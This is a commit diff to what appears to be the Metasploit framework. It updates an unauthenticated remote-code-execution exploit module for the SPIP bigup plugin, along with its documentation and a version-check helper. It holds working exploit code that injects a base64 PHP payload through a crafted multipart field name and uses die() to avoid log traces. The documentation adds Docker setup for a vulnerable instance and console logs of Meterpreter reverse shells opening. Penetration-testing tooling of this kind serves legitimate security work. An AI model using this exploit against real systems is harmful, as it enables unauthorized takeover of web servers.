Update documentation with docker setup, working mixin now, update module

Chocapikk · Chocapikk · commit 289f47fac181 · 2024-09-08T05:59:11.000+02:00
diff --git a/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md b/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
@@ -32,6 +32,25 @@ To complete the installation:
 1. Navigate to `http://localhost:8000/ecrire` to access the SPIP web installation panel.
 2. Follow the on-screen instructions to complete the setup.
 
+### Docker Setup
+
+To replicate a vulnerable environment for testing, follow these steps:
+
+1. Pull the vulnerable SPIP Docker image:
+
+```bash
+docker run --name casse-spip -p 8000:80 \
+    -e SPIP_DB_SERVER=sqlite3 \
+    -e SPIP_SITE_ADDRESS=http://127.0.0.1 \
+    -d ipeos/spip:4.3.1
+```
+
+2. Go to `http://localhost:8000` to access the SPIP application.
+
+It is recommended to use the Docker installation because the non-Docker version automatically
+retrieves the latest plugin updates, making the exploit ineffective.
+The Docker version ensures a vulnerable environment.
+
 ## Verification Steps
 
 1. Set up a SPIP instance using the commands provided above.
@@ -87,16 +106,19 @@ msf6 exploit(multi/http/spip_bigup_unauth_rce) > run http://127.0.0.1:8000
 [*] Started reverse TCP handler on 192.168.1.36:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] SPIP Version detected: 4.3.1
-[+] The target appears to be vulnerable. The detected SPIP version (4.3.1) is vulnerable.
+[+] SPIP version 4.3.1 is vulnerable.
+[*] Bigup plugin version detected: 3.2.11
+[+] The target appears to be vulnerable. Both the detected SPIP version (4.3.1) and bigup version (3.2.11) are vulnerable.
+[*] Found formulaire_action: login
+[*] Found formulaire_action_args: yt4d8ri/avF6LO/OwLA2O...
 [*] Preparing to send exploit payload to the target...
-[*] Sending stage (39927 bytes) to 192.168.1.36
-[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.36:46322) at 2024-09-03 20:08:36 +0200
+[*] Sending stage (39927 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.17.0.2:54956) at 2024-09-08 05:53:39 +0200
 
 meterpreter > sysinfo 
-Computer    : linux
-OS          : Linux linux 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64
+Computer    : d6c6866cac5a
+OS          : Linux d6c6866cac5a 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64
 Meterpreter : php/linux
-meterpreter > 
 ```
 
 With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
@@ -107,18 +129,21 @@ msf6 exploit(multi/http/spip_bigup_unauth_rce) > run http://127.0.0.1:8000
 [*] Started reverse TCP handler on 192.168.1.36:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] SPIP Version detected: 4.3.1
-[+] The target appears to be vulnerable. The detected SPIP version (4.3.1) is vulnerable.
+[+] SPIP version 4.3.1 is vulnerable.
+[*] Bigup plugin version detected: 3.2.11
+[+] The target appears to be vulnerable. Both the detected SPIP version (4.3.1) and bigup version (3.2.11) are vulnerable.
+[*] Found formulaire_action: login
+[*] Found formulaire_action_args: yt4d8ri/avF6LO/OwLA2O...
 [*] Preparing to send exploit payload to the target...
-[*] Sending stage (3045380 bytes) to 192.168.1.36
-[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:58062) at 2024-09-03 20:09:20 +0200
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.17.0.2:55956) at 2024-09-08 05:54:43 +0200
 
 meterpreter > sysinfo 
-Computer     : 192.168.1.36
-OS           : LinuxMint 21.3 (Linux 5.15.0-119-generic)
+Computer     : 172.17.0.2
+OS           : Debian 11.10 (Linux 5.15.0-119-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-meterpreter > 
 ```
 
 - The module successfully exploits the vulnerability and opens a Meterpreter session on the target.
diff --git a/lib/msf/core/exploit/remote/http/spip.rb b/lib/msf/core/exploit/remote/http/spip.rb
@@ -47,48 +47,23 @@ def spip_version
     # @param [String] plugin_name Name of the plugin to search for
     # @return [Rex::Version, nil] Version of the plugin as Rex::Version, or nil if not found
     def spip_plugin_version(plugin_name)
-      res = send_request_cgi(
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'spip.php')
-      )
-
+      res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'spip.php'))
       return unless res
 
-      # Check the Composed-By header for plugin version or config.txt URL
       composed_by = res.headers['Composed-By']
-      return unless composed_by
-
-      # Case 1: Look for config.txt URL in the header
-      if composed_by =~ %r{(https?://[^\s]+/local/config\.txt)}i
-        config_url = ::Regexp.last_match(1)
-        vprint_status("Found config.txt URL: #{config_url}")
-
-        # Fetch and parse the config.txt file directly
-        config_res = send_request_cgi(
-          'method' => 'GET',
-          'uri' => config_url
-        )
+      # Case 1: Check if 'Composed-By' header is present and not empty
+      return parse_plugin_version(composed_by, plugin_name) if composed_by && !composed_by.empty?
 
-        if config_res&.code == 200
-          return parse_plugin_version(config_res.body, plugin_name)
-        end
-      end
+      composed_by =~ %r{(https?://[^\s]+/local/config\.txt)}i
+      config_url = ::Regexp.last_match(1)
+      config_url ||= normalize_uri(target_uri.path, 'local', 'config.txt')
 
-      # Case 2: Check for plugin version directly in Composed-By
-      plugin_version = parse_plugin_version(composed_by, plugin_name)
-      return plugin_version if plugin_version
+      # Case 2: Send a request to fetch the config.txt file
+      config_res = send_request_cgi('method' => 'GET', 'uri' => config_url)
+      return unless config_res&.code == 200
 
-      # Case 3: Fallback to fetching /local/config.txt directly
-      vprint_status('No version found in Composed-By header. Attempting to fetch /local/config.txt directly.')
-      config_url = normalize_uri(target_uri.path, 'local', 'config.txt')
-      config_res = send_request_cgi(
-        'method' => 'GET',
-        'uri' => config_url
-      )
-
-      return parse_plugin_version(config_res.body, plugin_name) if config_res&.code == 200
-
-      nil
+      # Case 3: Parse the content of config.txt to find the plugin version
+      parse_plugin_version(config_res.body, plugin_name)
     end
 
     # Parse the plugin version from config.txt or composed-by
diff --git a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -83,7 +83,7 @@ def initialize(info = {})
   end
 
   def check
-    rversion = spip_version
+    rversion = spip_version || spip_plugin_version('spip')
     return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion
 
     print_status("SPIP Version detected: #{rversion}")
@@ -94,23 +94,26 @@ def check
       { start: Rex::Version.new('4.3.0'), end: Rex::Version.new('4.3.1') }
     ]
 
-    vulnerable_ranges.each do |range|
-      if rversion.between?(range[:start], range[:end])
-        print_good("SPIP version #{rversion} is vulnerable.")
-        break
-      end
+    is_vulnerable = vulnerable_ranges.any? { |range| rversion.between?(range[:start], range[:end]) }
+
+    unless is_vulnerable
+      return CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
     end
 
+    print_good("SPIP version #{rversion} is vulnerable.")
     plugin_version = spip_plugin_version('bigup')
+    print_status("Bigup plugin version detected: #{plugin_version}")
 
     unless plugin_version
       print_warning('Could not determine the version of the bigup plugin.')
       return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
     end
 
-    return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.") if plugin_version < Rex::Version.new('3.1.6')
+    if plugin_version < Rex::Version.new('3.2.12')
+      return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.")
+    end
 
-    CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
+    CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
   end
 
   # This function tests several pages to find a form with a valid CSRF token and its corresponding action.
@@ -142,55 +145,55 @@ def get_form_data
 
     nil
   end
-end
 
-# This function generates PHP code to execute a given payload on the target.
-# We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.
-# The payload is encoded in base64 to prevent issues with special characters.
-# The generated PHP code includes the necessary preamble and system block to execute the payload.
-# This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.
-def php_exec_cmd(encoded_payload)
-  vars = Rex::RandomIdentifier::Generator.new
-  dis = "$#{vars[:dis]}"
-  encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-  <<-END_OF_PHP_CODE
-            #{php_preamble(disabled_varname: dis)}
-            $c = base64_decode("#{encoded_clean_payload}");
-            #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-  END_OF_PHP_CODE
-end
+  # This function generates PHP code to execute a given payload on the target.
+  # We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.
+  # The payload is encoded in base64 to prevent issues with special characters.
+  # The generated PHP code includes the necessary preamble and system block to execute the payload.
+  # This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.
+  def php_exec_cmd(encoded_payload)
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = "$#{vars[:dis]}"
+    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+    <<-END_OF_PHP_CODE
+              #{php_preamble(disabled_varname: dis)}
+              $c = base64_decode("#{encoded_clean_payload}");
+              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+  end
 
-def exploit
-  form_data = get_form_data
+  def exploit
+    form_data = get_form_data
 
-  unless form_data
-    fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')
-  end
+    unless form_data
+      fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')
+    end
 
-  print_status('Preparing to send exploit payload to the target...')
+    print_status('Preparing to send exploit payload to the target...')
 
-  phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
-  b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')
+    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')
 
-  post_data = Rex::MIME::Message.new
+    post_data = Rex::MIME::Message.new
 
-  # This line is necessary for the form to be valid, works in tandem with formulaire_action_args
-  post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')
+    # This line is necessary for the form to be valid, works in tandem with formulaire_action_args
+    post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')
 
-  # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability
-  post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')
+    # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability
+    post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')
 
-  # Injection is performed here. The die() function is used to avoid leaving traces in the logs,
-  # prevent errors, and stop the execution of PHP after the injection.
-  post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")
+    # Injection is performed here. The die() function is used to avoid leaving traces in the logs,
+    # prevent errors, and stop the execution of PHP after the injection.
+    post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")
 
-  # This is necessary for the form to be accepted
-  post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')
+    # This is necessary for the form to be accepted
+    post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')
 
-  send_request_cgi({
-    'method' => 'POST',
-    'uri' => normalize_uri(target_uri.path, 'spip.php'),
-    'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-    'data' => post_data.to_s
-  }, 1)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'spip.php'),
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    }, 1)
+  end
 end
